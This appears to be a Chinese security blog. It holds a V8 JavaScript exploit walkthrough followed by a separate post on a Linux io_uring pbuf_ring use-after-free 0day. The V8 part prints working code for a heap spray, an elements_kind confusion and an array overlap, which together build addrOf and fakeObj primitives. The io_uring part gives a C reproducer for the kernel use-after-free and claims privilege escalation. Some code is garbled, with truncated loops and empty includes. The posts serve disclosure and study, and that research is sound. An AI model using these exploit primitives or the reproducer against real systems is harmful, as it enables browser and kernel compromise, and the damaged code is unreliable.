  Handle prototype(src_handle->prototype(), isolate);
  Map::SetPrototype(isolate, result, prototype);
  return result;
}

Map中包含如下字段

bitfield struct MapBitFields2 extends uint8 {
  new_target_is_base: bool: 1 bit;    // 要求一致
  is_immutable_prototype: bool: 1 bit;    // 要求一致
  elements_kind: ElementsKind: 6 bit;    // <=== 可不一致, 根据initial_map设置, 可控
}

bitfield struct MapBitFields3 extends uint32 {
  enum_length: int32: 10 bit;    // 不可控, 恒为invalid
  number_of_own_descriptors: int32: 10 bit;    // 不可控, 恒为0
  is_prototype_map: bool: 1 bit;    // 不可控, 恒为false
  is_dictionary_map: bool: 1 bit;    // 不可控, 恒为true
  owns_descriptors: bool: 1 bit;    // 不可控, 恒为false
  is_in_retained_map_list: bool: 1 bit;       // 不可控, 恒为false
  is_deprecated: bool: 1 bit;    // 不可控, 恒为0
  is_unstable: bool: 1 bit;
  is_migration_target: bool: 1 bit;    // 不可控, 恒为false
  is_extensible: bool: 1 bit;
  may_have_interesting_properties: bool: 1 bit;    // 不可控, 恒为true
  construction_counter: int32: 3 bit;
}


extern class Map extends HeapObject {
  ...
  // 这两个字段相等, 也就是没有in-obj property
  instance_size_in_words: uint8;  
  inobject_properties_start_or_constructor_function_index: uint8;

  used_or_unused_instance_size_in_words: uint8;
  visitor_id: uint8;
  instance_type: InstanceType;    // 要求一致, 所以只能是JSFunction
  bit_field: MapBitFields1;    // 要求一致
  bit_field2: MapBitFields2;   // 要求除了elements_kind都一致, 根据initial_map设置, 可控
  bit_field3: MapBitFields3;    // <== 可不一致, 根据initial_map设置, 但基本都不可控
  ...

  prototype: JSReceiver|Null; // 要求一致, 根据initial_map设置, 可控
  constructor_or_back_pointer_or_native_context: Object;    // 要求最终的constructor都是一样的, 继承自initial_map
  instance_descriptors: DescriptorArray;    // 不可控, 恒为空
  dependent_code: DependentCode;
  prototype_validity_cell: Smi|Cell;
  transitions_or_prototype_info: Map|Weak|TransitionArray|PrototypeInfo|Smi;
}

目标字段筛选

EquivalentToForNormalization中允许不一致的
并且Normalize()根据initial_map设置的字段, 那么就是我们可任意控制的

符合这两个条件的只有elements_kind字段
也就是说TransitionToDataProperty()在属性过多需要转换为dictionary map时, 会使用map->constructor->initial_map的elements_kind设置新隐式类的elements_kind

3.2.3 如何混淆elements_kind

elements kind的lattice如下, elements kind只能沿着格子向下转换, 也就是逐步变得更加的泛化, 下面这些都是fast elements kind, 也就是基于数组的

elements kind表示对象的可排序属性的保存方式, 对于下面这个默认job(o)->map->elements_kind = HOLEY_ELEMENTS, 他要变得更加宽泛就只能变成DICTIONARY_ELEMENTS

1 2	let o = function (){}; o["CanBeDeprecated"] = 1;

这部分EXP如下

let obj = Object;

// 使得job(Object)->map->constructor->properties被弃用
// 为job(Object)->map->constructor后面的越界读腾出32B空闲空间
Object.__proto__["aaa"] = 123;
// gc();    // 不要主动触发GC, 后面堆喷时触发GC命中概率更大

let arr = [];
function heap_spray(cnt){
    for(let i=0; i
        if(i%1000==0)
            print("heap spray ============> " + i);

        /*
            job(o)->map会被当做是job(Object)->map->constructor->initial_map
            job(Object)->map->instance_type为JS_FUNCTION_TYPE
            EquivalentToForNormalization()会检查下面两个map的instance_type是否一致
                - Normalize(job(o)->map)
                - job(Object)->map
            所以job(o)->map->instanl_map只能为JS_FUNCTION_TYPE
            因此o只能是JSFunction类型的对象
        */
        let o = function (){};
  
        /* 
            添加一个SMI属性, 为了绕过:
                # Fatal error in ../../src/objects/map.cc, line 598
                # Debug check failed: CanBeDeprecated().
        */
        o["CanBeDeprecated"] = i;

        /*
            job(o)->map->elements_kind默认为HOLEY_ELEMENTS
            添加稀疏的索引属性, 使其elements_kind泛化为DICTIONARY_ELEMENTS
            job(Object)->map->elements_kind默认为HOLEY_ELEMENTS
            这会导致TransitionToDataProperty()创新的新隐式类的lements_kind有误
            job(Object)->map->elements_kind被覆盖为DICTIONARY_ELEMENTS
        */
        for(let i=0; i<16; i++) {
            o[i*1000] = i;
        }
        arr.push(o);
    }
}
heap_spray(37000);  // 平均为第18500个对象喷上去

// job(obj)->elements为FixedArray, job(obj)->map->elements=HOLEY_ELEMENTS
obj[0] = 0;
obj[1] = 1;
obj[2] = 2;
obj[3] = 3;

// 触发TransitionToDataProperty()中的feedback_normalization部分代码
// 越界读到job(o)->map作为job(Object)->map->constructor->initial_map
// 使得job(Object)->map->elements_kind被覆盖为DICTIONARY_ELEMENTS
for (let i = 0; i < 3; i++) {
    print("add property ============> " + i);
    obj["p" + i] = i;
}

print("====== try to read");
%DebugPrint(obj);

// 这里就会触发DCHECK
print(obj[0]);
%SystemBreak();

由此扩大了战果, 得到了新的crash

# Fatal error in ../../src/objects/object-type.cc, line 82
# Type cast failed in CAST(elements) at ../../src/ic/accessor-assembler.cc:2561
  Expected NumberDictionary but found 0xdf9004ff835: [FixedArray]
 - map: 0x0df90000056d 
 - length: 17
           0: 0
           1: 1
           2: 2
           3: 3
        4-16: 0x0df900000741 

#
#
#
#FailureMessage Object: 0x7fffffffcb70
==== C stack trace ===============================

3.3 内存越界实现addrOf与fakeObj原语

总结一下之前的利用过程

首先是越界读误把job(Object)->map->constructor后面一个对象的map作为当作是job(Object)->map->constructor->initial_map
job(Object)->map->constructor后面一个对象刚好就是job(Object)->map->constructor->properties指向的PropertyArray对象. 添加属性释放该对象并通过堆喷使得越界读到的map字段可控
越界读到initial_map后会调用Normalize(initial_map)将其转换为dictionary_map, 并且会调用EquivalentToForNormalization()检查一些字段是否与job(Object)->map一致, 确认无误后, Normalize(initial_map)会作为job(Object)->map
Normalize()与EquivalentToForNormalization()不会对elements_kind字段进行任何检查, 默认job(Object)->map->elements_kind与job(Object)->map->constructor->initial->elements_kind是一致的, 由此导致job(Object)->map->elements_kind可以被伪造, 从HOLEY_ELEMENTS被覆盖为DICTIONARY_ELEMENTS, 但是job(Object)->elements不会改变

现在的问题: 把HOLEY_ELEMENTS混淆为DICTIONARY_ELEMENTS后如何利用?

研究读写elements时进行的操作, 看看能否转换为任意读写

3.3.1 `NumberDictionary`的内存布局

JSObject::eleemtns字段有两种模式

fast: 始终指向FixedArray类型的对象
slow: 指向NumberDictionary类型的对象

extern class JSObject extends JSReceiver {
  // [elements]: The elements (properties with names that are integers).
  //
  // Elements can be in two general modes: fast and slow. Each mode
  // corresponds to a set of object representations of elements that
  // have something in common.
  //
  // In the fast mode elements is a FixedArray and so each element can be
  // quickly accessed. The elements array can have one of several maps in this
  // mode: fixed_array_map, fixed_double_array_map,
  // sloppy_arguments_elements_map or fixed_cow_array_map (for copy-on-write
  // arrays). In the latter case the elements array may be shared by a few
  // objects and so before writing to any element the array must be copied. Use
  // EnsureWritableFastElements in this case.
  //
  // In the slow mode the elements is either a NumberDictionary or a
  // FixedArray parameter map for a (sloppy) arguments object.
  elements: FixedArrayBase;
}

FixedArrayBase是FixedArray和NumberDictionary的基类, 发现NumberDictionary是FixedArray的子类, 内存布局完全一致, 只是对于数组中项使用上的区别, 这是非常好的性质, 可以通过FixedArray中的SMI或者指针任意伪造NumberDictionary中的一些元数据字段

extern class FixedArrayBase extends HeapObject {
  const length: Smi;
}

extern class FixedArray extends FixedArrayBase {
  objects[length]: Object;
}

extern class HashTable extends FixedArray generates 'TNode';

extern class NumberDictionary extends HashTable;

那么NumberDictionary中数组的项有哪些用于元数据呢? 对于下面例子

let o = {};
o[0] = 0xFF00>>1;
o[1] = 0xFF01>>1;
o[2] = 0xFF02>>1;
o[9999] = 0xFFCC>>1;
delete o[0];
%DebugPrint(o);
%SystemBreak();

o的对象表示如下

内存布局如下

NumberDictionary采用数组来实现一个hash表, 解决hash冲突的方式简单, 如果如果hash(key) = i, 但是Entry[i]已经被占用了, 那么就直接延后尝试放在Entry[i+1], Entry[i+2], ...
因此在查询NumberDictionary时, 如果hash(key) = i, 那么就需要从Entry[i]开始遍历数组, 直到Entry[i].key == key为止

NumberDictionary:
    |---------------------|
    |        map          |
    |---------------------|
    |       length        |
    |---------------------|
    |      elements       |    <= 0
    |---------------------|
    |      deleted        |
    |---------------------|
    |      capacity       |
    |---------------------|
    |      max_key        |
    |---------------------|
    |        key          |    <= Entry[0]
    |---------------------|
    |        value        |
    |---------------------|
    |      details        |
    |---------------------|
    |        key          |    <= Entry[1]
    |---------------------|
    |        value        |
    |---------------------|
    |      details        |
    |---------------------|
        ....

3.3.2 伪造`NumberDictionary`对象

现在可以伪造一个NumberDictionary对象了, 应该尝试给一个很大的capacity, 使其越界读写

想要实现OOB需要解决两个问题

如何控制entry索引
如果控制job(obj)->elements后面的内存

回顾搜索过程, initial_entry = hash(index)&(capacity-1), hash计算的过程如下, 关键的是计算hash时会与HashSeed进行异或, 但是HashSeed()是随机数的不可控, 这就导致hash(index)的结果不可控

static uint32_t ComputeSeededIntegerHash(Isolate* isolate, int32_t key) {
  DisallowGarbageCollection no_gc;
  return ComputeSeededHash(static_cast(key), HashSeed(isolate));
}


void Heap::InitializeHashSeed() {
  DCHECK(!deserialization_complete_);
  uint64_t new_hash_seed;
  if (v8_flags.hash_seed == 0) {
    int64_t rnd = isolate()->random_number_generator()->NextInt64();
    new_hash_seed = static_cast(rnd);
  } else {
    new_hash_seed = static_cast(v8_flags.hash_seed);
  }
  Tagged<ByteArray> hash_seed = ReadOnlyRoots(this).hash_seed();
  MemCopy(hash_seed->begin(), reinterpret_cast(&new_hash_seed),
          kInt64Size);
}

思路

capacity是自己可以完全控制的, 不一定要完全为2的幂, 如果是0x1, 那么hash的结果就恒定为0, 这样就可以消除hash与随机数带来的熵
initial_entry只是大数组中起始搜索的位置, 只要key匹配不上后续就会一致遍历

那么怎么布局堆? 溢出覆盖哪一个对象?
现在是一个部分受限制的数组OOB

Entry[i].key必须已知
Entry[i].value可以被任意读写
Entry[i].details的最后1bit必须是0, 必须是SMI
i必须是2^n - 1, 这样稳定性最高, 位于数组最后一个, 无论initial_entry从哪里开始都可以命中. 这个可以通过填充[1, 2, 3, ...]来控制, 不难解决
图示:

 -------------
|    可知值    |    <= Entry[i].key
-------------- 
|    被读写    |    <= Entry[i].value
-------------- 
|   末尾1bit=0 |    <= Entry[i].details, 必须是SMI
--------------

或者溢出就控制JSArray中的元素, 因为想在相当于有了两种写入同一个对象中元素的方式, 能否搞出一个类型混淆, 直接实现fakeObj和addrOf原语?

POC如下, obj[0xDD]和arr[7]实际引用到的是同一个元素

// job(obj)->elements为FixedArray, job(obj)->map->elements_kind=HOLEY_ELEMENTS
// 后续elements_kind会被覆盖为DICTIONARY_ELEMENTS, job(obj)->elements会被当作是NumberDictionary对象
// 因此这里在FixedArray中伪造一个可以OOB的NumberDictionary
obj[0] = 0x7;    // elements
obj[1] = 0x0;    // deleted
obj[2] = 0x8;    // capacity
obj[3] = 0x8;    // max_key
// job(obj)->elements一共17项, 剩余13个空位用于Entry数组
// 一个Entry占据3个空位, 13=3*4+1, 这里先放置4个Entry
for(let entry=0; entry<4; entry++){
    obj[4+entry*3+0] = entry; // Entry[entry].key
    obj[4+entry*3+1] = 0x0; // Entry[entry].value
    obj[4+entry*3+2] = 0x0; // Entry[entry].details
}
obj[4+4*3+0] = 0xCC>>1; // Entry[4].key

// 在job(obj)->elements后面先是job(arr)->elements对应的FixedArray对象, 这个对象长度可以任意控制
// Entry[4].value对应job(arr)->elements->map
// Entry[4].detaisl对应job(arr)->elements->length
// 这样布局, 使得job(arr)->map刚好是NumberDictionary中Entry[7].value
let arr = Array.of(
    0x0, // Entry[5].key
    0x0, // Entry[5].value
    0x0, // Entry[5].details
    0x0, // Entry[6].key
    0x0, // Entry[6].value
    0x0, // Entry[6].details
    0xDD, // Entry[7].key
    0xbeef, // Entry[7].value
    0x0, // Entry[7].details
);

// 触发TransitionToDataProperty()中的feedback_normalization部分代码
// 越界读到job(o)->map作为job(Object)->map->constructor->initial_map
// 使得job(Object)->map->elements_kind被覆盖为DICTIONARY_ELEMENTS
for (let i = 0; i < 3; i++) {
    print("add property ============> " + i);
    obj["p" + i] = i;
}

// 这里 hash(0xCC)&(capacity-1) = hash(0xCC)&(2-1) = 0
// 从而获取Entry[0].value作为值
print("====== try to read obj[0xDD]");
print(obj[0xDD]);
print("====== try to read obj[0xDD]");
%SystemBreak();

SMI数组ptr使用最低1bit进行区分, 所以没法直接混淆, 可以让arr变成double array, 这样就可以完全控制一个Word中的所有bit, 完成double和TaggedPtr之间的混淆

总结: 虽然Entry溢出没法直接溢出到JSArray, Map等对象的关键字段, 但是可以直接使得job(obj)->elements的DictionArray对象与job(arr)->elements的FixedDoubleArray对象重叠, 这样就可以实现对于相同内存数据的不同解释方式:

job(obj)->elements认为Entry的key为TaggedPtr表示方式, 如果末尾1bit为1就会解释为js对象
job(arr)->elements认为内部是64字节的Double数据, 会将其作为纯数据控制

进一步的

addrOf()原语
- obj[0xDD] = {}相当于在job(obj)->elements.entry[7].value中对象指针
- 读入arr[3]相当于把job(arr)->elements[3]中的数据当做浮点数读出来
- 由于对象重叠job(arr)->elements[3]与job(obj)->elements.entry[7].value实际上是同一个内存地址, 这就可以泄露对象指针
fakeObj()原语: 思路是一样的, 先arr[3]=...以浮点数的方式写入数据, 然后obj[0xDD]将其作为对象指针读出来

3.3.3 绕过CSA CHECK

实测发现无法通过伪造capacity字段进行越界
伪造NumberDictionary::capacity字段的方式无法实现数组越界, 因为每次从job(obj)->elements中加载元素时总会与job(obj)->elements->length字段进行检查

template 
TNode CodeStubAssembler::LoadFixedArrayElement(
    TNode object, TNode index, int additional_offset,
    CheckBounds check_bounds) {
  ...

  if (NeedsBoundsCheck(check_bounds)) {    // Always
    FixedArrayBoundsCheck(object, index, additional_offset);
  }
  TNode element = LoadArrayElement(object, FixedArray::kHeaderSize,
                                                index, additional_offset);
  return CAST(element);
}

后续发现: 也就是说DictionaryNumber的读走的是CSA编写的方法, 这会进行字段的检查, 但是DictionaryNumber的写入走的是Runtime方法, Runtime方法并没有进行Elements数组边界检查, 这启发我们: 能否让DictionaryNumber的读操作也走Runtime方法, 以绕过CAS的CHECK检查

检查一下CSA实现的DictionaryNumber的Load的逻辑, 看一下怎么使其进入Runtime的处理方法

KeyedLoadIC_Megamorphic()会调用到KeyedLoadICGeneric(), KeyedLoadICGeneric():

首先调用TryToName()转换var_name, "0"可以转换为索引, 所以会进入if_index分支
if_index分支中会调用GenericElementLoad()在NumbericDictionary中根据index搜索对应的值, 如果搜索失败则进入if_runtime分支
if_runtime分支会调用runtime方法GetProperty()进行处理

void AccessorAssembler::KeyedLoadICGeneric(const LoadICParameters* p) {
  TVARIABLE(Object, var_name, p->name());    // key的名字
  Label if_runtime(this, Label::kDeferred);
  TNode lookup_start_object = p->lookup_start_object();    // 从哪个对象开始搜索属性
  // 要加载key的对象是SMI, null, undefined, 则进入if_runtime分支处理
  GotoIf(TaggedIsSmi(lookup_start_object), &if_runtime);
  GotoIf(IsNullOrUndefined(lookup_start_object), &if_runtime);

  {
    TVARIABLE(IntPtrT, var_index);
    TVARIABLE(Name, var_unique);
    Label if_index(this), if_unique_name(this, &var_name), if_notunique(this), if_other(this, Label::kDeferred);

    // 尝试把var_name转换为属性名字, 如果可以转换为数组索引, 则进入if_index分支
    TryToName(var_name.value(), &if_index, &var_index, &if_unique_name, &var_unique, &if_other, &if_notunique);
    ...

    BIND(&if_index);
    {
      Print("if_index");
      TNode lookup_start_object_map = LoadMap(CAST(lookup_start_object));
      GenericElementLoad(CAST(lookup_start_object), lookup_start_object_map,
                         LoadMapInstanceType(lookup_start_object_map),
                         var_index.value(), &if_runtime);
    }
  }

  BIND(&if_runtime);
  {
    // TODO(jkummerow): Should we use the GetProperty TF stub instead?
    TailCallRuntime(Runtime::kGetProperty, p->context(), p->receiver_and_lookup_start_object(), var_name.value());
  }
}

注意:

js中一个对象可以访问的属性除了自身内部定义的属性外, 还有其整个原型链上定义的属性, 都是可读写的
比如obj[0xDD]
- KeyedLoadICGeneric()的if_index分支, 就专门用于在job(obj)->elements中搜索0xDD对应的属性, 如果job(obj)->elements中不存在那么就会进入if_runtime分支
- if_runtime分支会调用Runtime方法GetProperty, GetProperty则是严格按照js中属性访问的定义来实现的, 如果job(obj)->elements中不存在, 还会搜索job(obj)->properties, 并沿着原型链job(obj)->map->prototype指向的对象进行搜索
- 也就是说: fast_path只会搜索对象自身, slow_path会沿着整个原型链进行完整的搜索

因此, 直接访问obj[0xDD]会命中CSA中的检查, 但是使用原型对象中转一下就可以实现通过Runtime路径完成读写obj[0xDD]这个属性

POC如下

obj2只是一个普通的JS_OBJECT对象, 自身没有任何属性, 因此KeyedLoadICGeneric()在处理obj2[0xDD]时是无法在job(obj2)->elements中找到这个属性, 因此会进入if_runtime分支
if_runtime分支的GetProperty()方法沿着原型链寻找, 最终在job(obj)->elements中找到0xDD对应的属性值, 在读入时runtime方法的get()并不会检查是否超过了job(obj)->elements->length由此完成越界读写

let obj2 = {};
obj2.__proto__ = obj;
%DebugPrint(obj2);
print("====== try to read obj[0xDD]");
print("====> "+ obj2[0xDD]);
print("====== try to read obj[0xDD]");

这也addrOf与fakeObj原语就齐全了

/*===============工具方法===============*/
// 下面这三个TypeArray共享同一个字节序列缓冲区
var f64 = new Float64Array(1);   
var bigUint64 = new BigUint64Array(f64.buffer); 
var u32 = new Uint32Array(f64.buffer);

function ftoi(f)
{
  f64[0] = f;
  return bigUint64[0];
}

function itof(i)
{
    bigUint64[0] = i;
    return f64[0];
}

function utof(lo, hi) {
    u32[0] = Number(lo);
    u32[1] = Number(hi);
    return f64[0];
}
  
function ftou(v) {
    f64[0] = v;
    return u32;
}

function hex(i)
{
    return "0x"+i.toString(16).padStart(16, "0");
}

/*===============工具方法===============*/

/*===============构造fakeObj()与addrOf()原语===============*/
let obj = Object;

// 使得job(Object)->map->constructor->properties被弃用
// 为job(Object)->map->constructor后面的越界读腾出32B空闲空间
Object.__proto__["aaa"] = 123;
// gc();    // 不要主动触发GC, 后面堆喷时触发GC命中概率更大

let spray_obj_arr = []; // 保持引用, 防止喷射的对象被GC掉
function heap_spray(cnt){
    for(let i=0; i
        if(i%5000==0)
            print("heap spray ============> " + i);

        /*
            job(o)->map会被当做是job(Object)->map->constructor->initial_map
            job(Object)->map->instance_type为JS_FUNCTION_TYPE
            EquivalentToForNormalization()会检查下面两个map的instance_type是否一致
                - Normalize(job(o)->map)
                - job(Object)->map
            所以job(o)->map->instanl_map只能为JS_FUNCTION_TYPE
            因此o只能是JSFunction类型的对象
        */
        let o = function (){};
  
        /* 
            添加一个SMI属性, 为了绕过:
                # Fatal error in ../../src/objects/map.cc, line 598
                # Debug check failed: CanBeDeprecated().
        */
        o["CanBeDeprecated"] = i;

        /*
            job(o)->map->elements_kind默认为HOLEY_ELEMENTS
            添加稀疏的索引属性, 使其elements_kind泛化为DICTIONARY_ELEMENTS
            job(Object)->map->elements_kind默认为HOLEY_ELEMENTS
            这会导致TransitionToDataProperty()创新的新隐式类的lements_kind有误
            job(Object)->map->elements_kind被覆盖为DICTIONARY_ELEMENTS
        */
        for(let i=0; i<16; i++) {
            o[i*1000] = i;
        }
        spray_obj_arr.push(o);
    }
}
heap_spray(37000);  // 平均为第18500个对象喷上去

// job(obj)->elements为FixedArray, job(obj)->map->elements_kind=HOLEY_ELEMENTS
// 后续elements_kind会被覆盖为DICTIONARY_ELEMENTS, job(obj)->elements会被当作是NumberDictionary对象
// 因此这里在FixedArray中伪造一个可以OOB的NumberDictionary
obj[0] = 0x7;    // elements
obj[1] = 0x0;    // deleted
obj[2] = 0x8;    // capacity
obj[3] = 0x100;    // max_key
// job(obj)->elements一共17项, 剩余13个空位用于Entry数组
// 一个Entry占据3个空位, 13=3*4+1, 这里先放置4个Entry
for(let entry=0; entry<4; entry++){
    obj[4+entry*3+0] = entry; // Entry[entry].key
    obj[4+entry*3+1] = 0x0; // Entry[entry].value
    obj[4+entry*3+2] = 0x0; // Entry[entry].details
}
obj[4+4*3+0] = 0xCC>>1; // Entry[4].key

// 在job(obj)->elements后面先是job(arr)->elements对应的FixedArray对象, 这个对象长度可以任意控制
// Entry[4].value对应job(arr)->elements->map
// Entry[4].detaisl对应job(arr)->elements->length
let arr = [
    // 通通常量展开, 避免对堆布局产生干扰
    // utof(   
    //     0x0,   // Entry[5].key 
    //     0x0,    // Entry[5].value
    // ),
    0.0,  
    // utof(
    //     0x0,    // Entry[5].details
    //     0x0,    // Entry[6].key
    // ),
    0.0,
    // utof(
    //     0x0,    // Entry[6].value
    //     0x0,    // Entry[6].details
    // ),
    0.0,
    // utof(
    //     0xDD<<1,    // Entry[7].key, 0xDD的SMI表示
    //     0x0,    // Entry[7].value
    // )
    2.184e-321,
    // utof(
    //     0x0,    // Entry[7].details
    //     0x0,    // Entry[8].key
    // ),
    0.0,
];

// 触发TransitionToDataProperty()中的feedback_normalization部分代码
// 越界读到job(o)->map作为job(Object)->map->constructor->initial_map
// 使得job(Object)->map->elements_kind被覆盖为DICTIONARY_ELEMENTS
for (let i = 0; i < 3; i++) {
    print("add property ============> " + i);
    obj["p" + i] = i;
}

// 检查是否喷射成功, 实现数组重叠
// 注意: obj[0xDD]会走CSA方法NumberDictionaryLookup()来实现, 该方法会检查elemebts是否越界
// 但是obj[0xDD]=...;会走Runtime方法SetObjectProperty()实现, Runtime方法在release编译时不会检查elements是否越界
print("====== try to store obj[0xDD]");
// obj[0xDD]在NumberDictionary中查找时总会命中Entry[7]
// 所以obj[0xDD]和arr[3]是重叠的, 但前者是TaggedPtr表示方式, 后者是Double的表示方法
obj[0xDD] = 0xdead;
if(arr[3]!=2.41928740128169e-309) { // arr[3]!=utof(0xDD<<1, 0xdead<<1)
    throw("sad, heap spray may fail");
}
print("NICE: heap spary success, obj[0xDD] overlaps arr[3]");

function addrOf(obj_to_leak) {
    // 0xDD根据NumberDictionaryLookup()的搜索会命中Entry[7]
    // 因此这里相当于 Entry[7].value = job(obj_to_leak)
    obj[0xDD] = obj_to_leak;
    // job(obj)->elements的NumberDictionary对象和job(arr)->elements的FixedDoubleArray是重叠的
    // Entry[7].value对应job(arr)->elements[3]的Double的高32bit
    return ftoi(arr[3])>>32n;
}

function fakeObj(addr) {
    // 同上这里以浮点数的方式不受限的写入Entry[7].value
    arr[3] = utof(
        0xDD<<1,    // Entry[7].key
        addr        // Entry[7].value
    );

    // 这里使用原型对象中转一下, 由于0xDD并没有直接定义在job(obj_agent)->elements中
    // 因此CSA实现的处理路径中KeyedLoadICGeneric()方法会进入miss分支, 由此进入Runtime实现的处理路径
    // 但是Runtime实现的处理方法SetObjectProperty()不会检查是否越界, 由此实现OOB读
    let obj_agent = {};
    obj_agent.__proto__ = obj;

    // 这里把Entry[7].value当作是指针读出来, 从而获取对象
    return obj_agent[0xDD];
}

/*===============构造fakeObj()与addrOf()原语===============*/

4. 漏洞利用展示

有了addrOf与fakeObj原语后, 还需要通过shellcode偷渡技术来绕过CFI保护(使用PKEY禁止写入rwx页), 本exp并未绕过v8 heap sandbox, 最终利用效果如下

linux内核io_uring模块pbuf_ring漏洞与提权0day

2022-07-29T08:07:28.000Z

本实验室使用syzkaller对linux-5.19-rc2版本的io_uring模块进行fuzz时, 在io_register_pbuf_ring()函数中发现了了一枚由于错误的异常处理导致的UAF漏洞, 通过slab跳跃与kernel unlink attack等技巧, 本文较为简单的堆环境下成功实现了提权. 但是目前该漏洞已经在5.19-rc8中被修复, 因此决定将该0day漏洞发现的过程与漏洞利用细节进行公布

crash现场

漏洞触发时的crash线程如下

BUG: KASAN: use-after-free in __io_remove_buffers.isra.0+0x4b1/0x6a0 fs/io_uring.c:5613
Read of size 2 at addr ffff888141a77012 by task kworker/u16:16/3825

Read路径: 
 __io_remove_buffers.isra.0+0x4b1/0x6a0 fs/io_uring.c:5613
 io_destroy_buffers fs/io_uring.c:11132 [inline]
 io_ring_ctx_free fs/io_uring.c:11214 [inline]
 io_ring_exit_work+0x9c9/0xfd6 fs/io_uring.c:11393
 process_one_work+0xa82/0x17c0 kernel/workqueue.c:2289
 worker_thread+0x5f9/0x1250 kernel/workqueue.c:2436
 kthread+0x2f2/0x3b0 kernel/kthread.c:376
 ret_from_fork+0x22/0x30 arch/x86/entry/entry_64.S:302
 

Allocate路径: 
 kcalloc include/linux/slab.h:671 [inline]
 io_init_bl_list.isra.0+0x24/0x102 fs/io_uring.c:5776
 io_register_pbuf_ring fs/io_uring.c:13006 [inline]
 __io_uring_register.cold+0x44/0xf2e fs/io_uring.c:13202
 __do_sys_io_uring_register fs/io_uring.c:13238 [inline]
 __se_sys_io_uring_register fs/io_uring.c:13218 [inline]
 __x64_sys_io_uring_register+0x2f2/0x610 fs/io_uring.c:13218

 do_syscall_x64 arch/x86/entry/common.c:50 [inline]
 do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80
 entry_SYSCALL_64_after_hwframe+0x46/0xb0

释放路径: 
 kfree+0xb0/0x330 mm/slub.c:4555
 io_register_pbuf_ring fs/io_uring.c:13026 [inline]
 __io_uring_register+0x1780/0x1ad0 fs/io_uring.c:13202
 __do_sys_io_uring_register fs/io_uring.c:13238 [inline]
 __se_sys_io_uring_register fs/io_uring.c:13218 [inline]
 __x64_sys_io_uring_register+0x2f2/0x610 fs/io_uring.c:13218

 do_syscall_x64 arch/x86/entry/common.c:50 [inline]
 do_syscall_64+0x3b/0x90 arch/x86/entry/common.c:80
 entry_SYSCALL_64_after_hwframe+0x46/0xb0

syzkaller成功复现并生成了一个C reproducer, 我将其进行美化后结果如下, 还是很容易复现的, 非root也可以触发

#define _GNU_SOURCE

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#ifndef __NR_io_uring_register
#define __NR_io_uring_register 427
#endif

#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup 425
#endif

int io_uring_setup(unsigned entries, struct io_uring_params* p)
{
    return (int)syscall(__NR_io_uring_setup, entries, p);
}

int io_uring_register(unsigned int fd, unsigned int opcode,
    void* arg, unsigned int nr_args)
{
    return (int)syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

#define IORING_REGISTER_PBUF_RING (22)

struct io_uring_buf_reg {
    __u64 ring_addr;
    __u32 ring_entries;
    __u16 bgid;
    __u16 pad;
    __u64 resv[3];
};

int main(void)
{
    struct io_uring_params p;
    memset(&p, 0, sizeof(p));
    int ring_fd = io_uring_setup(0x1, &p);

    struct io_uring_buf_reg reg;
    memset(®, 0, sizeof(reg));
    reg.ring_addr = 0xf00000000;
    reg.ring_entries = 0x20000000;

    io_uring_register(ring_fd, IORING_REGISTER_PBUF_RING, ®, 1);

    return 0;
}

源码分析

下面研究下io_uring_register(ring_fd, IORING_REGISTER_PBUF_RING, ®, 1);到底发生了什么

io_uring_register系统调用会调用__io_uring_register()处理, 根据opcode进入io_register_pbuf_ring()处理

static int __io_uring_register(
    struct io_ring_ctx* ctx, //io_uring上下文
    unsigned opcode,    //操作码
    void __user* arg,     //参数
    unsigned nr_args)    //多少个参数
{
    int ret;
    ...;
    switch (opcode) {
    case IORING_REGISTER_PBUF_RING: //BUG处在这里
        ret = -EINVAL;
        if (!arg || nr_args != 1)    //只能有一个参数
            break;
        ret = io_register_pbuf_ring(ctx, arg);
        break;
    ...;
    }

    return ret;
}

io_register_pbuf_ring()

首先检查传入的参数, 并在io_uring_context中分配io_buffer_list对象数组ctx->io_bl
然后根据参数中的缓冲区组ID找到对应的io_buffer_list对象
然后调用io_pin_pages()尝试根据用户给定的地址和长度分配FOLL_PIN的页,
如果分配分配失败, 就直接释放掉io_buffer_list对象, 但问题是io_bl指向的不是一个单独的对象, 而是对象数组中的一项, 不能单独释放, 因而造成漏洞

static int io_register_pbuf_ring(struct io_ring_ctx* ctx, void __user* arg)
{
    struct io_uring_buf_ring* br;
    struct io_uring_buf_reg reg;
    struct io_buffer_list* bl;
    struct page** pages;
    int nr_pages;

    //复制参数
    if (copy_from_user(®, arg, sizeof(reg)))
        return -EFAULT;

    //进行参数检查
    if (reg.pad || reg.resv[0] || reg.resv[1] || reg.resv[2])
        return -EINVAL;
    if (!reg.ring_addr)
        return -EFAULT;
    if (reg.ring_addr & ~PAGE_MASK)
        return -EINVAL;
    if (!is_power_of_2(reg.ring_entries))
        return -EINVAL;

    //为io uring context分配io buffer list对象数组
    if (unlikely(reg.bgid < BGID_ARRAY && !ctx->io_bl)) {
        int ret = io_init_bl_list(ctx); //这里分配了ctx->io_bl[64]
        if (ret)
            return ret;
    }

    //根据提供的buffer group id找到对应的缓冲区链表: return &ctx->io_bl[bgid];
    bl = io_buffer_get_list(ctx, reg.bgid);
    if (bl) {
        //如果映射的缓冲区ring或者类别存在, 不允许
        if (bl->buf_nr_pages || !list_empty(&bl->buf_list))
            return -EEXIST;
    } else {
        ...;
    }

    pages = io_pin_pages(
        reg.ring_addr,  //用户空间的起始地址
        struct_size(br, bufs, reg.ring_entries),    //分配多长
        &nr_pages); //结果参数: pin_user_pages()分配了多少页
    if (IS_ERR(pages)) {    //如果io_pin_pages()出错
        //就释放掉buffer list, 但是bl指向的是对象数组中的一项, 怎么能直接kfree掉呢
        // bl=&ctx->io_bl[bgid], 如果bgid=0, 这里就释放了整个ctx->io_bl
        //但是释放之后没有清除ctx->io_bl, 后续使用就会造成UAF
        kfree(bl);  
        return PTR_ERR(pages);
    }

    br = page_address(pages[0]);    //buffer ring所在地址

     //开始写入bl对象
    bl->buf_pages = pages; //指向pages对象数组
    bl->buf_nr_pages = nr_pages;    //包含多少页
    bl->nr_entries = reg.ring_entries;  //有多少项
    bl->buf_ring = br;  //指向ring的地址
    bl->mask = reg.ring_entries - 1;    //索引的掩码
    io_buffer_add_list(ctx, bl, reg.bgid);  //设置bl->bgid=reg.bgid, 并将其添加到ctx的XArray中

    return 0;
}

io_init_bl_list()为ctx->io_bl分配io_buffer_list对象数组并初始化

